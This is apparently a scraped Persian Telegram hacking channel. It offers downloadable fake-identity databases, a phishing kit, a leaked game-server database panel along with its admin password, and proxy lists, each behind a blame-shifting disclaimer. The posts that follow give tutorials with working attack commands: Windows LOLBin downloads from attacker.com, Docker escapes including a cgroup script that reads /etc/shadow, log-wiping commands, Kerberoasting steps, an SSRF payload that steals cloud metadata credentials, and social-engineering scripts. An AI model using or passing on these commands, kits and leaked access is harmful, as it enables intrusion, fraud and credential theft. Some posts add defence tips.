Spire Team
5.12K subscribers
71 photos
3 videos
92 files
174 links
> 🛡️ Ethical Hacking | Cyber Security
پاینده ایران و ایرانی
💻 Learn • Practice • Secure
🔐 Ethical & Educational Content Only
✅ We respect and follow Telegram's rules
🚫 No illegal or unauthorized activities
👤 @durov
Download Telegram
user-agents-100000.txt
11.9 MB
دیتابیس عظیم و بسیار قدرتمندی که شامل مجموعه‌ای کامل از ۱۰۰ هزار User-Agent سالم، معتبر و به‌روز است.

این پایگاه داده با ارائه طیف وسیعی از شناسه‌های کاربری استاندارد و غیراستاندارد، امکان شبیه‌سازی دقیق ترافیک وب را فراهم می‌کند و برای توسعه‌دهندگان، برنامه‌نویسان و متخصصان امنیت سایبری که نیاز به تست‌های جامع پراکسی، اسکریپت‌نویسی خودکار یا تحلیل رفتار مرورگرها دارند، منبعی ایده‌آل و غنی به شمار می‌رود.
‌
all_ipv4_500ips.zip
210.8 KB
دیتابیس ارائه‌شده شامل مجموعه‌ای بسیار گسترده و جامع از آدرس‌های اینترنتی نسخه چهار (IPv4) است که پوشش‌دهی جغرافیای آن به ۹۵ کشور مختلف در سراسر جهان گسترش دارد.

این پایگاه داده با ارائه اطلاعات دقیق و به‌روز، امکان شناسایی و تحلیل منبع ترافیک از نقاط مختلف جهان را فراهم می‌کند. به‌عنوان یک نمونه از ظرفیت و تنوع این دیتابیس، می‌توان به وجود حداقل ۵۰۰ آدرس IP منحصر‌به‌فرد و فعال برای هر یک از کشورهای ذکرشده اشاره کرد؛ این حجم از داده‌ها نشان‌دهنده عمق و گستردگی پوشش‌دهی شبکه‌ای در سطح بین‌المللی است و برای پروژه‌هایی که نیازمند تحلیل جغرافیایی ترافیک یا مدیریت دسترسی‌ها بر اساس موقعیت مکانی کاربران هستند، ابزاری ارزشمند و کارآمد به شمار می‌رود.
‌
all_ipv6_500ips.zip
551.4 KB
دیتابیس ارائه‌شده شامل مجموعه‌ای بسیار گسترده و جامع از آدرس‌های اینترنتی نسخه چهار (IPv6) است که پوشش‌دهی جغرافیای آن به ۹۲ کشور مختلف در سراسر جهان گسترش دارد.

این پایگاه داده با ارائه اطلاعات دقیق و به‌روز، امکان شناسایی و تحلیل منبع ترافیک از نقاط مختلف جهان را فراهم می‌کند. به‌عنوان یک نمونه از ظرفیت و تنوع این دیتابیس، می‌توان به وجود حداقل ۵۰۰ آدرس IP منحصر‌به‌فرد و فعال برای هر یک از کشورهای ذکرشده اشاره کرد؛ این حجم از داده‌ها نشان‌دهنده عمق و گستردگی پوشش‌دهی شبکه‌ای در سطح بین‌المللی است و برای پروژه‌هایی که نیازمند تحلیل جغرافیایی ترافیک یا مدیریت دسترسی‌ها بر اساس موقعیت مکانی کاربران هستند، ابزاری ارزشمند و کارآمد به شمار می‌رود.
‌
fake_identities_10countries_10cities_100pergender_2026-09-11.zip
15.3 MB
دیتابیس بسیار قوی شامل ۲۰ هزار اطلاعات داینامیک برای هویت جعلی.

۱۰ کشور: ایران، روسیه، آمریکا، آلمان، فرانسه، انگلیس، ژاپن، برزیل، هند، چین.
شهرهای واقعی: تهران، Москва و Los Angeles.

[PERSONAL]: مشخصات فردی
First Name: نام کوچک واقعی بر اساس کشور و جنسیت
Last Name: نام خانوادگی واقعی بر اساس کشور
Full Name: نام کامل
Gender: Male یا Female
Age: بین ۱۸ تا ۲۶ سال
Birth Year: سال تولد
Nationality: نام کشور

[CONTACT]: اطلاعات تماس
Email: ساخته‌شده از نام و فامیل
Phone: شماره با کد کشور، مثلاً +98 912 345 6789
Phone (Raw): شماره بدون فرمت

Street: خیابان و پلاک بر اساس خیابان‌های واقعی هر کشور
City: شهر
Postal Code: با الگوی واقعی هر کشور، مثلاً ایران ۱۰ رقم و آمریکا ۵ رقم
Country: کشور

[NETWORK]: اطلاعات شبکه
IPv4: با پیشوند شبیه کشور، مثلاً 5.x.x.x برای ایران
MAC Address: آدرس مک تصادفی

[MISC]: اطلاعات متفرقه
Username: نام کاربری
Password: رمز عبور تصادفی
Credit Card: شماره کارت ساختگی با پیشوند ۴
IBAN: شماره شبا ساختگی

‌
proxies-1786199678869.txt
59.7 KB
بیش‌از ۱ هزار پروکسی CORS قدرتمند استخراج شده از سایت corsproxy.io
ports.compact.json
822.4 KB
تمام (۶۵۵۳۵) پورت‌های جهان + سرویس ارائه دهنده‌ی آنها در قالب JSON
DigitalIdentityProfiles (1) (1).zip
25.4 MB
مخزن اطلاعات قدرتمند برای جعل اطلاعات

۲۰ کشور، هر کشور ۵ شهر، هر شهر ۳ سرویس‌دهنده IP، هر سرویس ۲۵ دستگاه txt و ۲۵ دستگاه json.
مجموعاً ۱۵ هزار دستگاه به دو فرمت.
panel.html
141.6 KB
پنل دیتابیس سرور بازی امپراتوری پارس
این پنل، توسط کاربر @Net_activenull استخراج و منتشر شده است.

رمز دسترسی به پنل مدیریت:
empire2024

برای افزایش سطح امنیت شبکه و جلوگیری از دسترسی‌های غیرمجاز، این بسته شامل ۲۰۰ عدد پروکسی CORS می‌باشد که امکان استفاده امن و مخفیانه از سرویس‌ها را فراهم می‌کند.

توجه داشته باشید که این محتوا صرفاً با هدف آموزشی و آشنایی با ساختارهای امنیتی ارائه شده است. مسئولیت هرگونه سوءاستفاده، دسترسی غیرمجاز یا استفاده نادرست از این اطلاعات بر عهده کاربر نهایی بوده و هیچ‌گونه ارتباطی با تولیدکنندگان محتوا ندارد.
NLP.html
127.3 KB
ربات قدرتمند Nullspire Ai

قابلیت‌های گسترده و پیشرفته:
- دسترسی نامحدود به ۵۳ API عمومی و معتبر: این ربات با اتصال به منابع اطلاعاتی کلیدی مانند گیت‌هاب (GitHub) برای مدیریت کدها و پروژه‌ها، ویکی‌پدیا (Wikipedia) برای دسترسی به دانش عمومی، و همچنین مجموعه‌ای از سایت‌های تخصصی اطلاعاتی و پایگاه‌های داده، امکان جمع‌آوری و پردازش حجم عظیمی از داده‌ها را فراهم می‌سازد.
- ابزارهای حرفه‌ای OSINT (هوش‌یابی منابع باز): Nullspire Ai مجهز به موتورهای جستجوی هوشمند است که فرآیند جمع‌آوری اطلاعات از منابع باز را به‌شکل خودکار و دقیق تسهیل می‌کند. این قابلیت برای تحلیل‌های عمیق، پایش اخبار و کشف اطلاعات پنهان بسیار مؤثر است.
- شخصی‌سازی بالا و انعطاف‌پذیری: کاربران می‌توانند با تنظیمات دقیق و شخصی‌سازی شده، رفتار ربات را مطابق با نیازهای خاص خود تنظیم کنند تا خروجی‌ها کاملاً متناسب با اهداف آن‌ها باشد.
- قدرت پردازش و سرعت بالا: با پشتیبانی از پردازش هم‌زمان درخواست‌ها و پاسخ‌گویی سریع، Nullspire Ai برای انجام پروژه‌های بزرگ و پیچیده ایده‌آل است.
❤5
sensitive-paths (2).zip
87.6 KB
Sensitive Path Wordlist Collection
مجموعه کامل مسیرها و payloadهای حساس برای تست نفوذ وب - نسخه 2026

فایل‌ها: 23
مسیرها: ۳٬۸۶۵
CVE: 307
❤7
Fishing_Monitor.html
64.4 KB
فایل کامل شامل نمونه کد فیشینگ وب، پنل مدیریتی و آموزش گام‌به‌گام که همه درون یک فایل واحد قرار دارند.

توجه داشته باشید که مسئولیت هرگونه سوءاستفاده یا استفاده غیرمجاز از این محتوا بر عهده کاربر است و ما هیچ مسئولیتی در قبال اقدامات شما نمی‌پذیریم.
❤8
عزیزان، ری‌اکشن ها رو بترکونید... 😂🌹
همین‌طوری که من کانال رو ترکوندم... 😂
❤13
پورت‌هایی که هر هکری باید حفظ باشه

یه سری پورت هست که دیدنشون یعنی یه جای کار می‌لنگه.

۲۱ FTP
اگه باز باشه و Anonymous Login فعال باشه، یعنی فاجعه.
ftp target.com
یوزر: anonymous
پسورد: خالی

۲۲ SSH
هدف شماره یک Brute Force.
اگه پسورد ضعیف باشه، تو چند دقیقه کرک میشه.

۲۳ Telnet
کاملاً ناامن. همه چی Plain Text.
حتی پسورد هم رمزنگاری نشده.
جایگزینش: SSH

۲۵ SMTP
اگه Open Relay باشه، می‌تونی با اون ایمیل اسپم بفرستی.
یعنی سرور تو رو به عنوان پل استفاده می‌کنه.

۴۴۵ SMB
هدف EternalBlue و WannaCry.
اگه ویندوز قدیمی و پچ نشده باشه، فاجعه.

۳۳۰۶ MySQL
اگه از بیرون باز باشه و پسورد root خالی باشه:
mysql -h target.com -u root
مستقیم می‌ری تو دیتابیس.

۳۳۸۹ RDP
هدف BlueKeep.
اگه ویندوز XP یا 7 باشه، اکسپلویت آماده‌ست.

۵۹۰۰ VNC
معمولاً پسورد کوتاه یا بدون پسورد.
مستقیم کنترل دسکتاپ.

نکته:
nmap -sV -p 21,22,23,25,445,3306,3389,5900 target.com

#ℳℴ𝒷𝒾𝓃
❤8
چطور بفهمیم یه سایت HTTPS واقعیه یا قلابی

همه فکر می‌کنن قفل کنار آدرس یعنی سایت امنه.
ولی فیشینگ‌ها هم می‌تونن قفل داشته باشن.

اول: دامنه رو حرف به حرف بخون

paypal.com با paypa1.com
google.com با goog1e.com
microsoft.com با rnicrosoft.com

بعضی حروف تو فونت‌های خاص شبیه همن.
m با rn، l با I، O با 0.

دوم: گواهی SSL رو چک کن

کلیک کن روی قفل، View Certificate رو بزن.
صادرکننده کی؟ Let's Encrypt عادیه.
تاریخ انقضا؟
اسم دامنه دقیقاً همونیه؟

سوم: از ابزار استفاده کن

curl -vI https://example.com 2>&1 | grep -i "subject\|issuer\|expire"

چهارم: گوگل Safe Browsing

برو به:
https://transparencyreport.google.com/safe-browsing/search

دامنه رو بذار، ببین قرمز نیست.

نکته طلایی:
اگه لینکی تو ایمیل یا پیامک اومد، هیچ‌وقت مستقیم کلیک نکن.
دستی تو مرورگر تایپ کن.

#ℳℴ𝒷𝒾𝓃
❤6
Living off the Land، هنر استفاده از خود ویندوز

هکرهای آماتور بدافزار میارن تو سیستم.
حرفه‌ای‌ها از خود ابزارهای ویندوز استفاده می‌کنن.

چرا؟

چون این ابزارها خود ویندوزن.
آنتی‌ویروس بهشون شک نمی‌کنه.
لاگ‌ها هم میگن "یه برنامه رسمی مایکروسافت اجرا شد".

نمونه‌هاش:

certutil -urlcache -f http://attacker.com/payload.exe
یه ابزار رسمی ویندوزه که برای دانلود گواهی طراحی شده.
ولی می‌تونی باهاش هر فایلی دانلود کنی.

bitsadmin /transfer job http://attacker.com/file.exe C:\temp\file.exe
سرویس رسمی ویندوز برای دانلود آپدیت.
می‌تونی ازش برای دانلود هر چیزی استفاده کنی.

mshta http://attacker.com/script.hta
اجرای اسکریپت از راه دور.
هیچ فایلی رو دیسک ذخیره نمیشه.

regsvr32 /s /n /u /i:http://attacker.com/file.sct scrobj.dll
اجرای اسکریپت از راه دور.
با یه DLL رسمی ویندوز.

wmic process call create "cmd /c payload"
اجرای پروسه از راه دور.

برای همین میگن، بدافزار مدرن لازم نیست فایل باشه.
کافیه از خود ویندوز استفاده کنی.

#ℳℴ𝒷𝒾𝓃
❤8
Container Escape، فرار از داکر

فرض کن یه اپلیکیشن وب رو هک کردی که تو داکر اجرا میشه.
حالا داخل کانتینری. ولی هدف، خود میزبانه.

راه‌های فرار:

۱. دسترسی به Docker Socket
اگه /var/run/docker.sock تو کانتینر مانت شده باشه:

docker -H unix:///var/run/docker.sock run -v /:/host -it ubuntu
حالا کل هارد میزبان رو داری.

۲. Privileged Container
اگه کانتینر با --privileged اجرا شده:

mount /dev/sda1 /mnt
chroot /mnt
حالا root میزبان هستی.

۳. Kernel Exploit
اگه نسخه کرنل آسیب‌پذیر باشه،
از داخل کانتینر، کرنل رو اکسپلویت می‌کنی.
مثل Dirty COW, Dirty Pipe.

۴. cgroup Escape
اگه cgroup v1 باشه و release_agent قابل نوشتن:

echo '#!/bin/sh' > /tmp/exploit.sh
echo 'cat /etc/shadow > /tmp/shadow' >> /tmp/exploit.sh
chmod +x /tmp/exploit.sh
echo /tmp/exploit.sh > /sys/fs/cgroup/release_agent

۵. CAP_SYS_ADMIN
اگه این Capability رو داشته باشی:

mount -t cgroup -o rdma cgroup /tmp/cgrp
یه سری تنظیمات، بعد فرار.

دفاع:
کانتینر رو non-root اجرا کن.
--privileged رو حذف کن.
Docker Socket رو داخل کانتینر نذار.
از Seccomp و AppArmor استفاده کن.

#ℳℴ𝒷𝒾𝓃
❤6
آسیب‌پذیری‌های منطقی، بدترین نوع باگ

بعضی باگ‌ها تکنیکی نیستن.
فقط یه فکر اشتباه تو منطق برنامه‌ست.

مثال ۱: کد تخفیف

یه فروشگاه آنلاین کد تخفیف داره: OFF50
وقتی می‌زنی، ۵۰٪ تخفیف می‌گیری.
حالا اگه یه بار دیگه بزنی چی میشه؟

بعضی سایت‌ها چک نمی‌کنن که کد قبلاً استفاده شده یا نه.
پس می‌تونی بی‌نهایت تخفیف بگیری.

مثال ۲: تغییر قیمت

وقتی یه محصول رو به سبد اضافه می‌کنی،
قیمت تو یه فیلد مخفی تو فرم ذخیره میشه.

حالا اگه قیمت رو از ۱۰۰۰ به ۱ تغییر بدی چی؟
بعضی سایت‌ها قیمت رو از سمت کاربر می‌خونن.
یعنی تو می‌تونی محصول رو یه تومان بخری.

مثال ۳: تغییر ID

example.com/order/1234

اگه 1234 رو به 1235 تغییر بدی چی؟
اگه سفارش کاربر دیگه رو ببینی، یعنی IDOR داری.
یعنی دسترسی کنترل درست پیاده نشده.

مثال ۴: پنل ادمین مخفی

example.com/admin

اگه صفحه لود نشد، یعنی فقط بر اساس URL چک می‌کنه.
اگه با یه هدر خاص بفرستی، شاید لود شه.
X-Forwarded-For: 127.0.0.1

چون خیلی از سرورها فکر می‌کنن درخواست از لوکاله.

#ℳℴ𝒷𝒾𝓃
❤6
مهندسی اجتماعی، حمله به انسان نه سیستم

بعضی وقتا نیازی نیست سیستمی رو هک کنی.
کافیه آدمش رو هک کنی.

۱. Pretexting
یه داستان می‌سازی که قابل باور باشه.
مثلاً خودت رو از IT شرکت جا می‌زنی و می‌گی:
"سلام، ما یه مشکل امنیتی تو سیستم شما دیدیم، برای تأیید، پسورد فعلی رو بگید."

۲. Baiting
یه فلش تو پارکینگ شرکت می‌ندازی.
روش نوشته: "حقوق کارمندان ۱۴۰۳"
کارمند پیدا می‌کنه، فلش رو می‌زنه به سیستم.
بدافزار اجرا میشه.

۳. Tailgating
پشت یه کارمند وارد ساختمان اداری میشی.
دست پرته، کارتت رو می‌زنی، بعد تو هم رد میشی.
هیچ‌کس نمی‌پرسه تو کی هستی.

۴. Quid Pro Quo
یه تماس می‌گیری، خودت رو از پشتیبانی جا می‌زنی.
می‌گی: "ما یه مشکل داریم، اگه کمک کنی یه تخفیف ویژه می‌گیری."

۵. Vishing
پیام صوتی می‌فرستی، خودت رو بانک جا می‌زنی.
"حساب شما مشکوک به کلاهبرداریه، برای تأیید شماره کارت رو بگید."

دفاع:
هیچ‌وقت اطلاعات حساس رو تلفنی یا ایمیلی ندید.
همیشه هویت طرف رو از راه دیگه چک کنید.
آموزش کارمندان مهم‌ترین لایه امنیته.

#ℳℴ𝒷𝒾𝓃
❤7
چرا لاگ‌ها مهم‌ترین بخش دفاع هستن

یه هکر حرفه‌ای، می‌تونه ردش رو پاک کنه.
ولی یه هکر معمولی، اصلاً نمی‌دونه کجا رد گذاشته.

لاگ‌های حیاتی که هکرها دنبال پاک کردنشون هستن:

Linux:
/var/log/auth.log → تلاش‌های SSH
/var/log/syslog → رویدادهای سیستم
/var/log/apache2/ → درخواست‌های وب
~/.bash_history → فرمان‌های کاربر

Windows:
Event ID 4624 → ورود موفق
Event ID 4625 → ورود ناموفق
Event ID 4688 → اجرای پروسه
Event ID 7045 → نصب سرویس

Sysmon:
Event ID 1 → اجرای پروسه
Event ID 3 → اتصال شبکه
Event ID 11 → ساخت فایل
Event ID 13 → تغییر رجیستری

حالا هکر چطور پاک می‌کنه؟

Linux:
history -c
unset HISTFILE
echo "" > /var/log/auth.log

Windows:
wevtutil cl Security
wevtutil cl System
Clear-EventLog -LogName *

چطور بفهمیم لاگ پاک شده؟

۱. اگه یه لاگ کاملاً خالیه، مشکوکه.
۲. اگه Event ID های معروف غیبن.
۳. اگه آخرین ورود تو لاگ، با چیزی که کاربر می‌گه نمی‌خونه.
۴. Sysmon می‌تونه لاگ‌ها رو به SIEM بفرسته، قبل از پاک شدن.

نکته:
همیشه لاگ‌ها رو Real-Time به یه سرور دیگه بفرست.
اون‌وقت حتی اگه سیستم قربانی کاملاً پاک شد، تو لاگ داری.

#ℳℴ𝒷𝒾𝓃
❤8🔥1
چرا آنتی‌ویروس‌ها همه چیز رو نمی‌گیرن

مردم فکر می‌کنن با یه آنتی‌ویروس خیالشون راحته.
ولی واقعیت اینه که بدافزارهای مدرن راه‌های زیادی برای فرار دارن.

۱. Fileless Malware
هیچ فایلی روی دیسک نوشته نمیشه.
کد تو حافظه RAM اجرا میشه.
بعد از ری‌استارت، هیچ اثری نیست.
آنتی‌ویروس چیزی برای اسکن پیدا نمی‌کنه.

۲. Living off the Land
از خود ابزارهای ویندوز استفاده می‌کنه.
مثل PowerShell, wmic, rundll32.
آنتی‌ویروس اینا رو به عنوان تهدید نمی‌بینه چون خود ویندوزن.

۳. Obfuscation
کد رو انقدر پیچیده می‌کنه که قابل خوندن نیست.
XOR, Base64, رمزنگاری سفارشی.
آنتی‌ویروس امضاش رو نمی‌شناسه.

۴. Polymorphism
هر بار که اجرا میشه، شکلش عوض میشه.
یه بار MD5 فلان، دفعه بعد یه چیز دیگه.
آنتی‌ویروس نمی‌تونه با امضا پیداش کنه.

۵. Sandbox Evasion
بدافزار چک می‌کنه تو Sandbox هست یا نه.
اگه بفهمه، خودش رو اجرا نمی‌کنه.
مثلاً چک می‌کنه CPU چنده، RAM چقدره.
اگه شبیه ماشین مجازی بود، دست به کار نمیشه.

دفاع واقعی:
آنتی‌ویروس فقط یه لایه‌ست.
لایه‌های دیگه: EDR, SIEM, Network Monitoring, User Training.

#ℳℴ𝒷𝒾𝓃
❤9
Supply Chain Attack، حمله از راه نرم‌افزار معتبر

مستقیم به هدف حمله نمی‌کنی.
نرم‌افزاری که هدف استفاده می‌کنه رو آلوده می‌کنی.

چرا؟

چون وقتی یه شرکت، آپدیت نرم‌افزارش رو منتشر می‌کنه،
همه مشتریاش اعتماد می‌کنن.
آپدیت امضا داره. از سرور رسمی میاد.

داستان‌های واقعی:

SolarWinds
مهاجم کد مخرب رو تو آپدیت Orion گذاشت.
۱۸۰۰۰ سازمان، از جمله دولت آمریکا، آلوده شدن.
مدت شناسایی: ۹ ماه.

NotPetya
آپدیت نرم‌افزار حسابداری اوکراینی M.E.Doc آلوده شد.
کل دنیا رو گرفت. ۱۰ میلیارد دلار خسارت.

event-stream (npm)
یه پکیج محبوب npm، مالکش عوض شد.
مالک جدید کد مخرب بهش اضافه کرد.
یه کتابخونه crypto wallet هدف قرار گرفت.

۳CX (بزرگ‌ترین)
مهاجم به سیستم یه کارمند ۳CX دسترسی گرفت.
از اونجا به سیستم مشتریاش رفت.
حدود ۲۰۰ مشتری، از جمله بانک‌ها.

دفاع:
همه وابستگی‌ها رو پین کن به نسخه دقیق.
Checksum رو چک کن.
از محیط ایزوله برای بیلد استفاده کن.
SBOM بساز.

#ℳℴ𝒷𝒾𝓃
❤6
Kerberoasting، حمله به Active Directory

فرض کن تو یه شبکه سازمانی هستی.
می‌خوای حساب‌های سرویس رو هک کنی.
پسوردشون رو نمی‌دونی.

Kerberoasting چیکار می‌کنه؟

توی Kerberos، هر سرویس یه SPN داره.
یه کاربر عادی می‌تونه بگه: "یه Ticket برای این SPN بده."

این Ticket رمزنگاری شده با هش پسورد اون سرویس.
یعنی هش پسورد، داخل Ticket هست.

حالا اگه Ticket رو بگیری، می‌تونی بری خونه و آفلاین کرکش کنی.
هیچ‌وقت نمی‌فهمن که داری کرک می‌کنی.

مراحل:

۱. پیدا کردن SPN ها
Get-ADUser -Filter {ServicePrincipalName -ne "$null"} -Properties ServicePrincipalName

۲. درخواست Ticket
Add-Type -AssemblyName System.IdentityModel
New-Object System.IdentityModel.Tokens.KerberosRequestorSecurityToken -ArgumentList "MSSQLSvc/sql01.corp.local:1433"

۳. استخراج Ticket
kerberos::list /export

۴. کرک آفلاین
tgsrepcrack.py wordlist.txt ticket.kirbi

چرا خطرناکه؟

چون حساب‌های سرویس معمولاً پسوردشون عوض نمیشه.
هش پسورد ممکنه سال‌ها تو AD بمونه.
پس یه هش قدیمی، ممکنه هنوز کار کنه.

دفاع:
حساب‌های سرویس رو با پسورد ۲۵+ کاراکتری بساز.
هر ۳۰ روز عوض کن.
از Group Managed Service Accounts استفاده کن.

#ℳℴ𝒷𝒾𝓃
❤4
Cloud Metadata، معدن طلا تو هر سرور ابری

هر سرور AWS, GCP, Azure یه آدرس مخفی داره.
این آدرس فقط از داخل خود سرور در دسترسه.

آدرسش:

AWS: http://169.254.169.254/latest/meta-data/
GCP: http://metadata.google.internal/computeMetadata/v1/
Azure: http://169.254.169.254/metadata/instance

چرا مهمه؟

چون تو این آدرس، اطلاعات حیاتی سرور هست.
از جمله IAM Credentials، که کلید دسترسی به حساب ابریه.

حالا SSRF رو در نظر بگیر.

فرض کن یه سایت داره:
example.com/fetch?url=http://example.com/image.jpg

حالا اگه بفرستی:
example.com/fetch?url=http://169.254.169.254/latest/meta-data/iam/security-credentials/

چی میشه؟

سرور ابری، از طرف خودش درخواست می‌کنه به آدرس metadata.
و بهت Credentials دسترسی میده.

با این Credentials می‌تونی:
همه S3 Bucket ها رو ببینی
همه EC2 ها رو کنترل کنی
همه دیتابیس‌ها رو بخونی

این حمله تو Capital One استفاده شد.
۱۲۰ میلیون کاربر لو رفت.
۲۰۰ میلیون دلار جریمه.

دفاع:
از IMDSv2 استفاده کن، نه v1.
تو سرور، دسترسی به 169.254.169.254 رو محدود کن.
ورودی‌های URL رو اعتبارسنجی کن.

#ℳℴ𝒷𝒾𝓃
❤4
OSINT حرفه‌ای، پیدا کردن چیزی که نباید پیدا بشه

مردم فکر می‌کنن اگه چیزی رو Delete کردن، از بین رفته.
ولی اینترنت فراموش نمی‌کنه.

تکنیک‌های طلایی:

۱. Google Dorks
site:target.com filetype:pdf
site:target.com inurl:admin
site:target.com ext:sql OR ext:log OR ext:bak

۲. Wayback Machine
web.archive.org

هر صفحه‌ای که یه روزی آنلاین بوده، آرشیوش هست.
حتی اگه حذف شده باشه.
حتی اگه پنل ادمین باشه که بعداً بسته شده.

۳. GitHub Search
"company.com" password
"internal api" org:company
filename:.env "DB_PASSWORD"

خیلی وقتا کارمندها اشتباهاً کد یا پسورد رو Push می‌کنن.

۴. Certificate Transparency
crt.sh

هر گواهی SSL که برای دامنه صادر شده، اینجا ثبت میشه.
از این لیست، زیردامنه‌های مخفی رو پیدا می‌کنی.

۵. Shodan / Censys
org:"Company Name"
product:"Apache"
port:8080 country:IR

۶. Have I Been Pwned
haveibeenpwned.com

ایمیل کارمندان رو بده، ببین تو کدوم دیتابیس لو رفته بودن.
ممکنه همون پسورد قدیمی رو هنوز استفاده کنن.

۷. Social Media
کارمندا عکس از محیط کار می‌گیرن.
روی مانیتور، اسم نرم‌افزارها.
روی میز، کاغذهایی که پسورد دارن.
روی کارت، بج شرکت.

دفاع:
مهم‌ترین چیز، آگاهی کارمنداست.
هر چیزی که آنلاین می‌ذارن، ممکنه روزی علیه‌شون استفاده شه.

#ℳℴ𝒷𝒾𝓃
❤4